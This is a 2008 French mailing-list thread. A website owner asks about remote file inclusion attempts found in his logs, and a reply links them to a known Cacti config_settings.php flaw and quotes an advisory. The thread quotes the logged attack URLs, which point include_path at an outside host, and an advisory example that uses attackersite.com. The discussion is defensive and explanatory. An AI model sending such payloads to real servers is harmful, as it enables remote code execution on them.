2008/4/2 Yann Cochard <[EMAIL PROTECTED]>: > Bonjour, > > Sur mon site en PHP, je repère des tentatives d'intrusion / prise de > contrôle / récupération de données sensibles. Elles n'ont pas l'air > efficaces (c'est pour ça que j'en ai connaissance d'ailleurs : j'ai un > log d'erreur), et se font par massage de paramètres. > Exemple : > > http://monsite/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > ou même : > > http://monsite/mapage.html/config_settings.php?config[include_path]=http://www.health-nutrition-business.com/echo.txt? > Comme je n'ai pas de page config_settings.php et que mes pages ne > prennent pas les paramètres de cette manière, ça ne marche pas... o_O > Pour voir le contenu du script que l'attaquant essaie de faire > tourner, voyez ce fichier texte : > http://www.health-nutrition-business.com/echo.txt > > La question que je me pose : ces attaques sont-elles conçus pour des > programmes PHP connus (par exemple phpBB), ou bien peuvent-elles > fonctionner sur du code maison ? > Comment s'en prémunir ? > > Merci > Yann
Ca m'a tout l'air de ressembler à l'exploitation de faille sur cacti: jette un oeil là: http://www.verisign.com/security-intelligence-service/current-intelligence/vulnerability-advisories/2005/266.html Extrait: [...] II. DESCRIPTION Cacti contains an input validation error in the config_settings.php script which allows an attacker to include arbitrary PHP code from remote sites. This in effect allows arbitrary code execution with the privileges of the web server. The vulnerability specifically exists due to the script trusting a user supplied include_path variable. The following example demonstrates how this might be exploited: http://example.com/include/config_settings.php?config[include_path]=http://attackersite.com/ In this way the file http://attackersite.com/config_arrays.php will be included and executed on the vulnerable server with the privileges of the web server. III. ANALYSIS Successful exploitation of this vulnerability allows a remote attacker to gain shell access with the privileges of the web server. An attacker can then attempt to escalate privileges using local exploits, possibly allowing a full root compromise. [...] Question: il y a pas mal de graphiques sur http://monsite/ ? Cacti sert à la construction de graphs.... mais ça peut très bien être aussi un robot qui cible des serveurs web au hasard... Plus d'info sur cacti: http://www.cacti.net/ Donc oui la cible est un outil largement distribué, et à moins que tu ne sois complètement taré pour introduire des failles pareilles permettant l'exécution de scripts distants en paramêtre GET dans tes pages persos, tu ne risques pas grand chose..... car déjà il faut que la page existe... le paramètre ainsi que le code qui lance l'exécution du-dit script. Nicolas Diffusez cette liste aupres de vos relations :) Linux Azur : http://linux-azur.org L'auteur du post est responsable de ses écrits ! *** Pas de message SMS, HTML ni de PJ SVP ***
